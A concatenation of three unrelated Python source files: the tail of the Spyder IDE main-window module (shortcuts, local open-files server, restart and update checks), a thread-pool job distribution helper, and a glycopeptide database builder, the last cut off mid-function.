widget = plugin.create_configwidget(dlg)
if widget is not None:
dlg.add_page(widget)
except Exception:
traceback.print_exc(file=sys.stderr)
if self.prefs_index is not None:
dlg.set_current_index(self.prefs_index)
dlg.show()
dlg.check_all_settings()
dlg.pages_widget.currentChanged.connect(self.__preference_page_changed)
dlg.exec_()
def __preference_page_changed(self, index):
"""Preference page index has changed"""
self.prefs_index = index
def set_prefs_size(self, size):
"""Save preferences dialog size"""
self.prefs_dialog_size = size
#---- Shortcuts
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_sc_to_tip=False):
"""
Register QAction or QShortcut to Spyder main application,
with shortcut (context, name, default)
"""
self.shortcut_data.append( (qaction_or_qshortcut, context,
name, add_sc_to_tip) )
def apply_shortcuts(self):
"""Apply shortcuts settings to all widgets/plugins"""
toberemoved = []
for index, (qobject, context, name,
add_sc_to_tip) in enumerate(self.shortcut_data):
keyseq = QKeySequence( get_shortcut(context, name) )
try:
if isinstance(qobject, QAction):
if sys.platform == 'darwin' and \
qobject._shown_shortcut == 'missing':
qobject._shown_shortcut = keyseq
else:
qobject.setShortcut(keyseq)
if add_sc_to_tip:
add_shortcut_to_tooltip(qobject, context, name)
elif isinstance(qobject, QShortcut):
qobject.setKey(keyseq)
except RuntimeError:
# Object has been deleted
toberemoved.append(index)
for index in sorted(toberemoved, reverse=True):
self.shortcut_data.pop(index)
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See Issue 1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""
Quit and Restart Spyder application.
If reset True it allows to reset spyder on restart.
"""
# Get start path to use in restart script
spyder_start_directory = get_module_path('spyder')
restart_script = osp.join(spyder_start_directory, 'app', 'restart.py')
# Get any initial argument passed when spyder was started
# Note: Variables defined in bootstrap.py and spyder/app/start.py
env = os.environ.copy()
bootstrap_args = env.pop('SPYDER_BOOTSTRAP_ARGS', None)
spyder_args = env.pop('SPYDER_ARGS')
# Get current process and python running spyder
pid = os.getpid()
python = sys.executable
# Check if started with bootstrap.py
if bootstrap_args is not None:
spyder_args = bootstrap_args
is_bootstrap = True
else:
is_bootstrap = False
# Pass variables as environment variables (str) to restarter subprocess
env['SPYDER_ARGS'] = spyder_args
env['SPYDER_PID'] = str(pid)
env['SPYDER_IS_BOOTSTRAP'] = str(is_bootstrap)
env['SPYDER_RESET'] = str(reset)
if DEV:
if os.name == 'nt':
env['PYTHONPATH'] = ';'.join(sys.path)
else:
env['PYTHONPATH'] = ':'.join(sys.path)
# Build the command and popen arguments depending on the OS
if os.name == 'nt':
# Hide flashing command prompt
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
shell = False
else:
startupinfo = None
shell = True
command = '"{0}" "{1}"'
command = command.format(python, restart_script)
try:
if self.closing(True):
subprocess.Popen(command, shell=shell, env=env,
startupinfo=startupinfo)
self.console.quit()
except Exception as error:
# If there is an error with subprocess, Spyder should not quit and
# the error can be inspected in the internal console
print(error)
print(command)
# ---- Interactive Tours
def show_tour(self, index):
""" """
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Check for Spyder Updates
def _check_updates_ready(self):
"""Called by WorkerUpdates when ready"""
from spyder.widgets.helperwidgets import MessageCheckBox
# feedback` = False is used on startup, so only positive feedback is
# given. `feedback` = True is used when after startup (when using the
# menu action, and gives feeback if updates are, or are not found.
feedback = self.give_updates_feedback
# Get results from worker
update_available = self.worker_updates.update_available
latest_release = self.worker_updates.latest_release
error_msg = self.worker_updates.error
url_r = 'https://github.com/spyder-ide/spyder/releases'
url_i = 'http://pythonhosted.org/spyder/installation.html'
# Define the custom QMessageBox
box = MessageCheckBox()
box.setWindowTitle(_("Spyder updates"))
box.set_checkbox_text(_("Check for updates on startup"))
box.setStandardButtons(QMessageBox.Ok)
box.setDefaultButton(QMessageBox.Ok)
box.setIcon(QMessageBox.Information)
# Adjust the checkbox depending on the stored configuration
section, option = 'main', 'check_updates_on_startup'
check_updates = CONF.get(section, option)
box.set_checked(check_updates)
if error_msg is not None:
msg = error_msg
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
else:
if update_available:
msg = _("<b>Spyder %s is available!</b> <br><br>Please use "
"your package manager to update Spyder or go to our "
"<a href=\"%s\">Releases</a> page to download this "
"new version. <br><br>If you are not sure how to "
"proceed to update Spyder please refer to our "
" <a href=\"%s\">Installation</a> instructions."
"") % (latest_release, url_r, url_i)
box.setText(msg)
box.set_check_visible(True)
box.exec_()
check_updates = box.is_checked()
elif feedback:
msg = _("Spyder is up to date.")
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
# Update checkbox based on user interaction
CONF.set(section, option, check_updates)
# Enable check_updates_action after the thread has finished
self.check_updates_action.setDisabled(False)
# Provide feeback when clicking menu if check on startup is on
self.give_updates_feedback = True
@Slot()
def check_updates(self):
"""
Check for spyder updates on github releases using a QThread.
"""
from spyder.workers.updates import WorkerUpdates
# Disable check_updates_action while the thread is working
self.check_updates_action.setDisabled(True)
if self.thread_updates is not None:
self.thread_updates.terminate()
self.thread_updates = QThread(self)
self.worker_updates = WorkerUpdates(self)
self.worker_updates.sig_ready.connect(self._check_updates_ready)
self.worker_updates.sig_ready.connect(self.thread_updates.quit)
self.worker_updates.moveToThread(self.thread_updates)
self.thread_updates.started.connect(self.worker_updates.start)
self.thread_updates.start()
#==============================================================================
# Utilities to create the 'main' function
#==============================================================================
def initialize():
"""Initialize Qt, patching sys.exit and eventually setting up ETS"""
# This doesn't create our QApplication, just holds a reference to
# MAIN_APP, created above to show our splash screen as early as
# possible
app = qapplication()
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
#----Monkey patching rope
try:
from spyder import rope_patch
rope_patch.apply()
except ImportError:
# rope is not installed
pass
#----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
#----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
if PYQT5:
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
# Selecting Qt4 backend for Enthought Tool Suite (if installed)
try:
from enthought.etsconfig.api import ETSConfig
ETSConfig.toolkit = 'qt4'
except ImportError:
pass
return app
class Spy(object):
"""
Inspect Spyder internals
Attributes:
app Reference to main QApplication object
window Reference to spyder.MainWindow widget
"""
def __init__(self, app, window):
self.app = app
self.window = window
def __dir__(self):
return list(self.__dict__.keys()) +\
[x for x in dir(self.__class__) if x[0] != '_']
def versions(self):
return get_versions()
def run_spyder(app, options, args):
"""
Create and show Spyder's main window
Start QApplication event loop
"""
#TODO: insert here
# Main window
main = MainWindow(options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.shell.exit_interpreter()
except BaseException:
pass
raise
main.show()
main.post_visible_setup()
if main.console:
main.console.shell.interpreter.namespace['spy'] = \
Spy(app=app, window=main)
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main():
"""Main function"""
# **** Collect command line options ****
# Note regarding Options:
# It's important to collect options before monkey patching sys.exit,
# otherwise, optparse won't be able to exit if --help option is passed
options, args = get_options()
if set_attached_console_visible is not None:
set_attached_console_visible(DEBUG or options.show_console \
or options.reset_config_files \
or options.reset_to_defaults \
or options.optimize)
app = initialize()
if options.reset_config_files:
# <!> Remove all configuration files!
reset_config_files()
return
elif options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults(save=True)
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# Show crash dialog
if CONF.get('main', 'crash', False) and not DEV:
CONF.set('main', 'crash', False)
SPLASH.hide()
QMessageBox.information(None, "Spyder",
"Spyder crashed during last session.<br><br>"
"If Spyder does not start at all and <u>before submitting a "
"bug report</u>, please try to reset settings to defaults by "
"running Spyder with the command line option '--reset':<br>"
"<span style=\'color: #555555\'><b>python spyder --reset"
"</b></span><br><br>"
"<span style=\'color: #ff5555\'><b>Warning:</b></span> "
"this command will remove all your Spyder configuration files "
"located in '%s').<br><br>"
"If restoring the default settings does not help, please take "
"the time to search for <a href=\"%s\">known bugs</a> or "
"<a href=\"%s\">discussions</a> matching your situation before "
"eventually creating a new issue <a href=\"%s\">here</a>. "
"Your feedback will always be greatly appreciated."
"" % (get_conf_path(), __project_url__,
__forum_url__, __project_url__))
# Create main window
mainwindow = None
try:
mainwindow = run_spyder(app, options, args)
except BaseException:
CONF.set('main', 'crash', True)
import traceback
traceback.print_exc(file=STDERR)
traceback.print_exc(file=open('spyder_crash.log', 'w'))
if mainwindow is None:
# An exception occured
SPLASH.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
parallel.py | import threading
from time import sleep
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor
from bioprocs.utils.shell2 import runcmd
from traceback import format_exc
from queue import Queue
def distribute(total, nthread):
"""
Try to distribute jobs into N threads as equal as possible.
For example: distributing 10 jobs on 3 threads, we prefer (4, 3, 3) than (4, 4, 2)
How to do it?
1. get the ceiling size for each thread, that should be (3, 3, 3), from `divmod(10, 3)[0]`
2. get the modulo by `divmod(10, 3)[1]`, which is the first # nthreads to add one more job to
@params:
`total`: The total # jobs
`nthread`: The # threads
@returns:
A list of # jobs distribute on each thread.
"""
nthread = min(total, nthread)
(m, d) = divmod(total, nthread)
ret = [m] * nthread
for i in range(d):
ret[i] += 1
return ret
def distributeList(joblist, nthread):
lists = distribute(len(joblist), nthread)
start = 0
for l in lists:
yield joblist[start:l+start]
start += l
class Parallel(object):
def __init__(self, nthread = 1, backend = 'thread', raiseExc = False):
PoolExecutor = ProcessPoolExecutor if backend.lower() in 'multiprocessing' else ThreadPoolExecutor
self.executor = PoolExecutor(max_workers = nthread)
self.raiseExc = raiseExc
def __del__(self):
if self.executor:
self.executor.shutdown()
@staticmethod
def _run(func, arg):
if callable(func):
ret = func(*arg)
return ret
else:
return runcmd(func.format(*arg))
def run(self, func, args):
submits = []
results = []
exception = None
excno = 0
for arg in args:
submits.append(self.executor.submit(Parallel._run, func, arg))
for submit in submits:
try:
results.append(submit.result())
except Exception as ex:
#results.append(None)
exception = type(ex), format_exc()
excno += 1
if excno > 0 and self.raiseExc:
raise exception[0](exception[1])
return results
class LargeFileHandler(object):
HAND = -1
def __init__(self, reader, compute = None, summarize = None, compute_multi = None, summarize_multi = None, size = 1000, readfunc = lambda r: next(r), nthread = 1, raiseExc = True):
LargeFileHandler.HAND = -1
self.reader = reader
self.readfunc = readfunc
self.raiseExc = raiseExc
self.size = size
self.queue = Queue()
self.nthread = nthread
self.compute = compute
self.summarize = summarize
self.compute_multi = compute_multi
self.summarize_multi = summarize_multi
self.index = 0
self.lock = threading.Lock()
self.stop = False
if self.compute and self.compute_multi:
raise ValueError('Only one of compute and compute_multi is needed.')
if self.summarize and self.summarize_multi:
raise ValueError('Only one of summarize and summarize_multi is needed.')
if not callable(self.compute) and not callable(self.compute_multi):
raise ValueError('One of compute and compute_multi is needed.')
if not callable(self.summarize) and not callable(self.summarize_multi):
raise ValueError('One of summarize and summarize_multi is needed.')
for _ in range(nthread):
self.producer()
def producer(self):
if self.stop: return
with self.lock:
lines = []
for _ in range(self.size):
try:
line = self.readfunc(self.reader)
if line is False: break
if line is None:
self.stop = True
break
lines.append(line)
except StopIteration:
break
if lines:
self.queue.put((self.index, lines))
self.index += 1
def run(self):
for _ in range(self.nthread):
t = threading.Thread(target = self.worker)
t.daemon = True
t.start()
self.queue.join()
def worker(self):
while not self.queue.empty():
index, data = self.queue.get()
try:
if self.compute:
computed = [self.compute(d) for d in data]
else:
computed = self.compute_multi(data)
while LargeFileHandler.HAND + 1 != index:
sleep(.01)
if self.summarize:
for c in computed:
self.summarize(c)
else:
self.summarize_multi(computed)
self.producer()
except:
if self.raiseExc:
raise
finally:
LargeFileHandler.HAND = index
self.queue.task_done()
|
common.py | import itertools
from uuid import uuid4
from collections import defaultdict, Counter
from multiprocessing import Process, Queue, Event, RLock
from threading import Thread
from itertools import product
try:
from Queue import Empty as QueueEmptyException
except ImportError:
from queue import Empty as QueueEmptyException
from glypy import Composition
from glypy.composition import formula
from glypy.structure.glycan_composition import FrozenGlycanComposition
from glycan_profiling.serialize import DatabaseBoundOperation, func
from glycan_profiling.serialize.hypothesis import GlycopeptideHypothesis
from glycan_profiling.serialize.hypothesis.peptide import Glycopeptide, Peptide, Protein, ProteinSite
from glycan_profiling.serialize.hypothesis.glycan import (
GlycanCombination, GlycanClass, GlycanComposition,
GlycanTypes, GlycanCombinationGlycanComposition)
from glycan_profiling.serialize.utils import toggle_indices
from glycan_profiling.task import TaskBase
from glycan_profiling.database.builder.glycan import glycan_combinator
from glycan_profiling.database.builder.base import HypothesisSerializerBase
from glycopeptidepy.structure.sequence import (
_n_glycosylation, _o_glycosylation, _gag_linker_glycosylation)
_DEFAULT_GLYCAN_STEP_LIMIT = 15000
def slurp(session, model, ids, flatten=True):
if flatten:
ids = [j for i in ids for j in i]
total = len(ids)
last = 0
step = 100
results = []
while last < total:
results.extend(session.query(model).filter(
model.id.in_(ids[last:last + step])))
last += step
return results
class GlycopeptideHypothesisSerializerBase(DatabaseBoundOperation, HypothesisSerializerBase):
"""Common machinery for Glycopeptide Hypothesis construction.
Attributes
----------
uuid : str
The uuid of the hypothesis to be constructed
"""
def __init__(self, database_connection, hypothesis_name=None, glycan_hypothesis_id=None, full_cross_product=True):
DatabaseBoundOperation.__init__(self, database_connection)
self._hypothesis_name = hypothesis_name
self._hypothesis_id = None
self._hypothesis = None
self._glycan_hypothesis_id = glycan_hypothesis_id
self.uuid = str(uuid4().hex)
self.total_glycan_combination_count = -1
self.full_cross_product = full_cross_product
def _construct_hypothesis(self):
if self._hypothesis_name is None or self._hypothesis_name.strip() == "":
self._hypothesis_name = self._make_name()
if self.glycan_hypothesis_id is None:
raise ValueError("glycan_hypothesis_id must not be None")
self._hypothesis = GlycopeptideHypothesis(
name=self._hypothesis_name, glycan_hypothesis_id=self._glycan_hypothesis_id,
uuid=self.uuid)
self.session.add(self._hypothesis)
self.session.commit()
self._hypothesis_id = self._hypothesis.id
self._hypothesis_name = self._hypothesis.name
self._glycan_hypothesis_id = self._hypothesis.glycan_hypothesis_id
def _make_name(self):
return "GlycopeptideHypothesis-" + self.uuid
@property
def glycan_hypothesis_id(self):
if self._glycan_hypothesis_id is None:
self._construct_hypothesis()
return self._glycan_hypothesis_id
@property
def n_glycan_only(self):
if self._hypothesis is None:
self._construct_hypothesis()
return self._hypothesis.n_glycan_only
def peptide_ids_with_n_glycosites(self):
# May include the residue beyond the final
q = self.session.query(Peptide.id.distinct()).join(Protein).join(Protein.sites).filter(
Peptide.spans(ProteinSite.location) &
(ProteinSite.name == ProteinSite.N_GLYCOSYLATION) &
Protein.hypothesis_id == self._hypothesis_id).all()
return [i[0] for i in q]
def peptide_ids(self):
if self.n_glycan_only:
return self.peptide_ids_with_n_glycosites()
q = self.session.query(Peptide.id).filter(Peptide.hypothesis_id == self._hypothesis_id).all()
return [i[0] for i in q]
def combinate_glycans(self, n):
combinator = glycan_combinator.GlycanCombinationSerializer(
self.engine, self.glycan_hypothesis_id,
self.hypothesis_id, n)
combinator.run()
self.total_glycan_combination_count = combinator.total_count
if not (self.total_glycan_combination_count > 0):
raise ValueError("No glycan combinations were generated. No glycopeptides can be produced!")
def _count_produced_glycopeptides(self):
count = self.query(
func.count(Glycopeptide.id)).filter(
Glycopeptide.hypothesis_id == self.hypothesis_id).scalar()
self.log("Generated %d glycopeptides" % count)
self.set_parameters({
"database_size": count
})
return count
def _sql_analyze_database(self):
self.log("Analyzing Indices")
self._analyze_database()
if self.is_sqlite():
self._sqlite_reload_analysis_plan()
self.log("Done Analyzing Indices")
class GlycopeptideHypothesisDestroyer(DatabaseBoundOperation, TaskBase):
def __init__(self, database_connection, hypothesis_id):
DatabaseBoundOperation.__init__(self, database_connection)
self.hypothesis_id = hypothesis_id
def delete_glycopeptides(self):
self.log("Delete Glycopeptides")
self.session.query(Glycopeptide).filter(
Glycopeptide.hypothesis_id == self.hypothesis_id).delete(
synchronize_session=False)
self.session.commit()
def delete_peptides(self):
self.log("Delete Peptides")
q = self.session.query(Protein.id).filter(Protein.hypothesis_id == self.hypothesis_id)
for protein_id, in q:
self.session.query(Peptide).filter(
Peptide.protein_id == protein_id).delete(
synchronize_session=False)
self.session.commit()
def delete_protein(self):
self.log("Delete Protein")
self.session.query(Protein).filter(Protein.hypothesis_id == self.hypothesis_id).delete(
synchronize_session=False)
self.session.commit()
def delete_hypothesis(self):
self.log("Delete Hypothesis")
self.session.query(GlycopeptideHypothesis).filter(
GlycopeptideHypothesis.id == self.hypothesis_id).delete()
self.session.commit()
def run(self):
self.delete_glycopeptides()
self.delete_peptides()
self.delete_protein()
self.delete_hypothesis()
self.session.commit()
def distinct_glycan_classes(session, hypothesis_id):
structure_classes = session.query(GlycanClass.name.distinct()).join(
GlycanComposition.structure_classes).join(
GlycanCombinationGlycanComposition).join(
GlycanCombination).filter(
GlycanCombination.hypothesis_id == hypothesis_id).all()
return [sc[0] for sc in structure_classes]
def composition_to_structure_class_map(session, glycan_hypothesis_id):
mapping = defaultdict(list)
id_to_class_iterator = session.query(GlycanComposition.id, GlycanClass.name).join(
GlycanComposition.structure_classes).filter(
GlycanComposition.hypothesis_id == glycan_hypothesis_id).all()
for gc_id, sc_name in id_to_class_iterator:
mapping[gc_id].append(sc_name)
return mapping
def combination_structure_class_map(session, hypothesis_id, composition_class_map):
mapping = defaultdict(list)
iterator = session.query(
GlycanCombinationGlycanComposition).join(GlycanCombination).filter(
GlycanCombination.hypothesis_id == hypothesis_id).order_by(GlycanCombination.id)
for glycan_id, combination_id, count in iterator:
listing = mapping[combination_id]
for i in range(count):
listing.append(composition_class_map[glycan_id])
return mapping
class GlycanCombinationPartitionTable(TaskBase):
def __init__(self, session, glycan_combinations, glycan_classes, hypothesis):
self.session = session
self.tables = defaultdict(lambda: defaultdict(list))
self.hypothesis_id = hypothesis.id
self.glycan_hypothesis_id = hypothesis.glycan_hypothesis_id
self.glycan_classes = glycan_classes
self.build_table(glycan_combinations)
def build_table(self, glycan_combinations):
composition_class_map = composition_to_structure_class_map(
self.session, self.glycan_hypothesis_id)
combination_class_map = combination_structure_class_map(
self.session, self.hypothesis_id, composition_class_map)
for entry in glycan_combinations:
size_table = self.tables[entry.count]
component_classes = combination_class_map[entry.id]
class_assignment_generator = product(*component_classes)
for classes in class_assignment_generator:
counts = Counter(c for c in classes)
key = tuple(counts[c] for c in self.glycan_classes)
class_table = size_table[key]
class_table.append(entry)
def build_key(self, mapping):
return tuple(mapping.get(c, 0) for c in self.glycan_classes)
def get_entries(self, size, mapping):
key = self.build_key(mapping)
return self.tables[size][key]
def __getitem__(self, key):
size, mapping = key
return self.get_entries(size, mapping)
def limiting_combinations(iterable, n, limit=100):
i = 0
for result in itertools.combinations(iterable, n):
i += 1
yield result
if i > limit:
break
class GlycanCombinationRecord(object):
__slots__ = [
'id', 'calculated_mass', 'formula', 'count', 'glycan_composition_string',
'_composition', '_dehydrated_composition']
def __init__(self, combination):
self.id = combination.id
self.calculated_mass = combination.calculated_mass
self.formula = combination.formula
self.count = combination.count
self.glycan_composition_string = combination.composition
self._composition = None
self._dehydrated_composition = None
def total_composition(self):
if self._composition is None:
self._composition = self.convert().total_composition()
return self._composition
def dehydrated_composition(self):
if self._dehydrated_composition is None:
self._dehydrated_composition = self.total_composition() - (Composition("H2O") * self.count)
return self._dehydrated_composition
def convert(self):
gc = FrozenGlycanComposition.parse(self.glycan_composition_string)
gc.id = self.id
gc.count = self.count
return gc
def __repr__(self):
return "GlycanCombinationRecord(%d, %s)" % (
self.id, self.glycan_composition_string)
class PeptideGlycosylator(object):
def __init__(self, session, hypothesis_id, glycan_offset=None, glycan_limit=_DEFAULT_GLYCAN_STEP_LIMIT):
self.session = session
self.glycan_offset = glycan_offset
self.glycan_limit = glycan_limit
self.hypothesis_id = hypothesis_id
self.hypothesis = self.session.query(GlycopeptideHypothesis).get(hypothesis_id)
self.total_combinations = self._get_total_combination_count()
self.build_glycan_table(self.glycan_offset)
def _get_total_combination_count(self):
count = self.session.query(
GlycanCombination).filter(
GlycanCombination.hypothesis_id == self.hypothesis_id).count()
return count
def _load_glycan_records(self):
if self.glycan_offset is None:
glycan_combinations = self.session.query(
GlycanCombination).filter(
GlycanCombination.hypothesis_id == self.hypothesis_id).all()
glycan_combinations = [GlycanCombinationRecord(gc) for gc in glycan_combinations]
else:
glycan_combinations = self.session.query(
GlycanCombination).filter(
GlycanCombination.hypothesis_id == self.hypothesis_id).offset(
self.glycan_offset).limit(self.glycan_limit).all()
return glycan_combinations
def _build_size_table(self, glycan_combinations):
self.glycan_combination_partitions = GlycanCombinationPartitionTable(
self.session, glycan_combinations, distinct_glycan_classes(
self.session, self.hypothesis_id), self.hypothesis)
def build_glycan_table(self, offset=None):
self.glycan_offset = offset
glycan_combinations = self._load_glycan_records()
self._build_size_table(glycan_combinations)
def handle_peptide(self, peptide):
water = Composition("H2O")
peptide_composition = Composition(str(peptide.formula))
obj = peptide.convert()
reference = obj.clone()
# Handle N-linked glycosylation sites
n_glycosylation_unoccupied_sites = set(peptide.n_glycosylation_sites)
for site in list(n_glycosylation_unoccupied_sites):
if obj[site][1]:
n_glycosylation_unoccupied_sites.remove(site)
for i in range(len(n_glycosylation_unoccupied_sites)):
i += 1
for gc in self.glycan_combination_partitions[i, {GlycanTypes.n_glycan: i}]:
total_mass = peptide.calculated_mass + gc.calculated_mass - (gc.count * water.mass)
formula_string = formula(peptide_composition + gc.dehydrated_composition())
for site_set in limiting_combinations(n_glycosylation_unoccupied_sites, i):
sequence = reference.clone()
for site in site_set:
sequence.add_modification(site, _n_glycosylation.name)
sequence.glycan = gc.convert()
glycopeptide_sequence = str(sequence)
glycopeptide = dict(
calculated_mass=total_mass,
formula=formula_string,
glycopeptide_sequence=glycopeptide_sequence,
peptide_id=peptide.id,
protein_id=peptide.protein_id,
hypothesis_id=peptide.hypothesis_id,
glycan_combination_id=gc.id)
yield glycopeptide
# Handle O-linked glycosylation sites
o_glycosylation_unoccupied_sites = set(peptide.o_glycosylation_sites)
for site in list(o_glycosylation_unoccupied_sites):
if obj[site][1]:
o_glycosylation_unoccupied_sites.remove(site)
for i in range(len(o_glycosylation_unoccupied_sites)):
i += 1
for gc in self.glycan_combination_partitions[i, {GlycanTypes.o_glycan: i}]:
total_mass = peptide.calculated_mass + gc.calculated_mass - (gc.count * water.mass)
formula_string = formula(peptide_composition + gc.dehydrated_composition())
for site_set in limiting_combinations(o_glycosylation_unoccupied_sites, i):
sequence = reference.clone()
for site in site_set:
sequence.add_modification(site, _o_glycosylation.name)
sequence.glycan = gc.convert()
glycopeptide_sequence = str(sequence)
glycopeptide = dict(
calculated_mass=total_mass,
formula=formula_string,
glycopeptide_sequence=glycopeptide_sequence,
peptide_id=peptide.id,
protein_id=peptide.protein_id,
hypothesis_id=peptide.hypothesis_id,
glycan_combination_id=gc.id)
yield glycopeptide
# Handle GAG glycosylation sites
gag_unoccupied_sites = set(peptide.gagylation_sites)
for site in list(gag_unoccupied_sites):
if obj[site][1]:
gag_unoccupied_sites.remove(site)
for i in range(len(gag_unoccupied_sites)):
i += 1
for gc in self.glycan_combination_partitions[i, {GlycanTypes.gag_linker: i}]:
total_mass = peptide.calculated_mass + gc.calculated_mass - (gc.count * water.mass)
formula_string = formula(peptide_composition + gc.dehydrated_composition())
for site_set in limiting_combinations(gag_unoccupied_sites, i):
sequence = reference.clone()
for site in site_set:
sequence.add_modification(site, _gag_linker_glycosylation.name)
sequence.glycan = gc.convert()
glycopeptide_sequence = str(sequence)
glycopeptide = dict(
calculated_mass=total_mass,
formula=formula_string,
glycopeptide_sequence=glycopeptide_sequence,
peptide_id=peptide.id,
protein_id=peptide.protein_id,
hypothesis_id=peptide.hypothesis_id,
glycan_combination_id=gc.id)
yield glycopeptide
def null_log_handler(msg):
print(msg)
class PeptideGlycosylatingProcess(Process):
process_name = "glycopeptide-build-worker"
def __init__(self, connection, hypothesis_id, input_queue, chunk_size=5000, done_event=None,
log_handler=null_log_handler, glycan_offset=None,
glycan_limit=_DEFAULT_GLYCAN_STEP_LIMIT):
Process.__init__(self)
self.daemon = True
self.connection = connection
self.input_queue = input_queue
self.chunk_size = chunk_size
self.hypothesis_id = hypothesis_id
self.done_event = done_event
self.log_handler = log_handler
self.glycan_offset = glycan_offset
self.glycan_limit = glycan_limit
self.session = None
self.work_done_event = Event()
def is_work_done(self):
return self.work_done_event.is_set()
def process_result(self, collection):
self.session.bulk_insert_mappings(Glycopeptide, collection, render_nulls=True)
self.session.commit()
def load_peptides(self, work_items):
peptides = slurp(self.session, Peptide, work_items, flatten=False)
return peptides
def task(self):
database = DatabaseBoundOperation(self.connection)
self.session = database.session
has_work = True
glycosylator = PeptideGlycosylator(
database.session, self.hypothesis_id,
glycan_offset=self.glycan_offset,
glycan_limit=self.glycan_limit)
result_accumulator = []
n = 0
n_gps = 0
while has_work:
try:
work_items = self.input_queue.get(timeout=5)
if work_items is None:
has_work = False
continue
except Exception:
if self.done_event.is_set():
has_work = False
continue
peptides = self.load_peptides(work_items)
n += len(peptides)
for peptide in peptides:
for gp in glycosylator.handle_peptide(peptide):
result_accumulator.append(gp)
if len(result_accumulator) > self.chunk_size:
n_gps += len(result_accumulator)
self.process_result(result_accumulator)
result_accumulator = []
if len(result_accumulator) > 0:
n_gps += len(result_accumulator)
self.process_result(result_accumulator)
result_accumulator = []
self.work_done_event.set()
# It seems there is no public API to force the process to check if it is done
# but the internal method is invoked when creating a Process `repr` on Python 2.
# This problem supposedly doesn't exist in Python 3.
repr(self)
self.log_handler("Process %r completed. (%d peptides, %d glycopeptides)" % (self.pid, n, n_gps))
def run(self):
new_name = getattr(self, 'process_name', None)
if new_name is not None:
TaskBase().try_set_process_name(new_name)
try:
self.task()
except Exception as e:
import traceback
self.log_handler(
"An exception has occurred for %r.\n%r\n%s" % (
self, e, traceback.format_exc()))
class NonSavingPeptideGlycosylatingProcess(PeptideGlycosylatingProcess):
def process_result(self, collection):
pass
class QueuePushingPeptideGlycosylatingProcess(PeptideGlycosylatingProcess):
def __init__(self, connection, hypothesis_id, input_queue, output_queue, chunk_size=5000,
done_event=None, log_handler=null_log_handler, database_mutex=None,
glycan_offset=None, glycan_limit=_DEFAULT_GLYCAN_STEP_LIMIT):
super(QueuePushingPeptideGlycosylatingProcess, self).__init__(
connection, hypothesis_id, input_queue, chunk_size, done_event, log_handler,
glycan_offset=glycan_offset, glycan_limit=glycan_limit)
self.output_queue = output_queue
self.database_mutex = database_mutex
def load_peptides(self, work_items):
with self.database_mutex:
result = super(QueuePushingPeptideGlycosylatingProcess, self).load_peptides(work_items)
return result
def process_result(self, collection):
self.output_queue.put(collection)
class MultipleProcessPeptideGlycosylator(TaskBase):
def __init__(self, connection_specification, hypothesis_id, chunk_size=6500, n_processes=4,
glycan_combination_count=None, glycan_limit=_DEFAULT_GLYCAN_STEP_LIMIT):
self.n_processes = n_processes
self.connection_specification = connection_specification
self.chunk_size = chunk_size
self.hypothesis_id = hypothesis_id
self.glycan_combination_count = glycan_combination_count
self.current_glycan_offset = 0
self.glycan_limit = glycan_limit
self.input_queue = Queue(10)
self.output_queue = Queue(1000)
self.workers = []
self.dealt_done_event = Event()
self.ipc_controller = self.ipc_logger()
self.database_mutex = RLock()
def spawn_worker(self):
worker = QueuePushingPeptideGlycosylatingProcess(
self.connection_specification, self.hypothesis_id, self.input_queue,
self.output_queue, self.chunk_size, self.dealt_done_event,
self.ipc_controller.sender(), self.database_mutex,
glycan_offset=self.current_glycan_offset,
glycan_limit=self.glycan_limit)
return worker
def push_work_batches(self, peptide_ids):
n = len(peptide_ids)
i = 0
chunk_size = min(int(n * 0.05), 1000)
while i < n:
